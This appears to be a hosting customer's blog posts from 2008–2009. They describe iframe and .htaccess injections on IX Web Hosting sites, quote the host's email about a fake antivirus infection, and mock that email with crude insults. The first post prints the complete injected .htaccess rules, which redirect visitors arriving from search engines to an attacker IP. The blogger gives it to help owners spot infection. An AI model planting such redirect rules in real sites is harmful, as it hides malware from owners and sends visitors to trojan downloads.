Is YOUR site INFECTED by the Yahoo Counter or .htaccess

A lot of people are contacting me, asking HOW you would know if your  site is infected?.
Let me start by saying that in some cases you will know immidiately when somthing is wrong, but in other cases it might not be too clear.

The YAHOO COUNTER SCRIPT

Click Image to Enlarge

is an iFrame Javascript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX web Hosting customers are infected with this code, and they do not even know it! The web Page looks normal, but this can be very dangerous, your website will eventually drop from ALL the mayor search engines, and your domain will be flagged as “Dangerous Malware” by all the search engines.
To check if you have the Yahoo Counter injected, visit any search engine, and visit your site, If your site loads as it should, BUT  it still shows “Loading” in the taskbar for some time, and then in most cases ( but not always) an ” Acrobat Reader” Error message will pop up.

Now you must Check the “Source Code” ( Menu Bar –> View –> Source ) and you will notice the Code that has been injected.

 

The .htaccess Injection

This is a very sneaky Injection, the reason being, is because most people that have and check their websites, access them by either a shortcut, or directly through the search bar by using the url, In both these cases, your website will be perfectly normal, BUT, anyone trying to access your website  through any of the mayor Search Engines, will be re-directed.

Click Images to Enlarge

Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…

Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.

An example of the injected .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )
 

Remember, you only get re-directed if you click on your url from a search engine

January 11, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, customers, hacked, hackers, hacking, iFrame injection, infected, injected script, insecure, malicious files, unhappy, unreliable, virus | 2 Comments

26,991 IX Web hosting customers infected

Dear Nicole,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:

http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009

* 79,469 websites have been spreading the Anti-Virus 2009 infection

 

* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO

IX Web Hosting

h**p://www.ixwebhosting.com

 

******************************************************

 

WOW!!!… Let’s break this down..

• In our ongoing commitment to the security of our customers
  Well at least they have a sense of humor
• we have discovered a vulnerability located within many of our client’s websites, including yours.
  Actually us customers dicovered this SIX MONTHS AGO!!
• This is a self replicating virus which is found by visiting well-known search engines
  Hahahaha… so first they blame the customers, now they are blaming all the mayor search engines..
• At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website.
  Yeahhhh, I know exactly what you are thinking!!.. and Yes it is these idiots that are running IX web hosting … If you believe this, you’ll believe anything.
• We have dedicated our systems administration team to finding a solution.
  Yeahh Right, thats like trying to get a lead balloon to fly!! 
• To illustrate the severity of the issue I would like to share some facts with you:

   

      * 26,991 of our customers have been infected with fake Anti-Virus 2009

      * 79,469 websites have been spreading the Anti-Virus 2009 infection

      * 120,923 malicious files have been removed from our system
  What can I say?, 26,991 customers fault.. Ooohh and let’s not forget Google..

   

• We are proud to say that we are among the first web hosts to identify this particular problem
  What this really means, is they are proud of themselves, for being able to bullshit their customers into thinking it’s the customer and Google’s fault.

   

• and have been the first to offer a resolution.
  So these incompetent retards, think that blaming others for their incompetence, and wasting their time by having them download junk, and scan their PC … a Resolution??

• If you have questions regarding any of this information, please contact our support team anytime.
  I think I would rather have someone use my eyeballs  as pin cushions than have to deal with the Notourious IX Web Hosting Support .. thats like tring to wipe your arse with your teeth!!

December 11, 2008 Posted by neverixweb | IX Web Hosting | customersm, infected, innocent customers, IX, IX Web Hosting, malicious files, virus | 4 Comments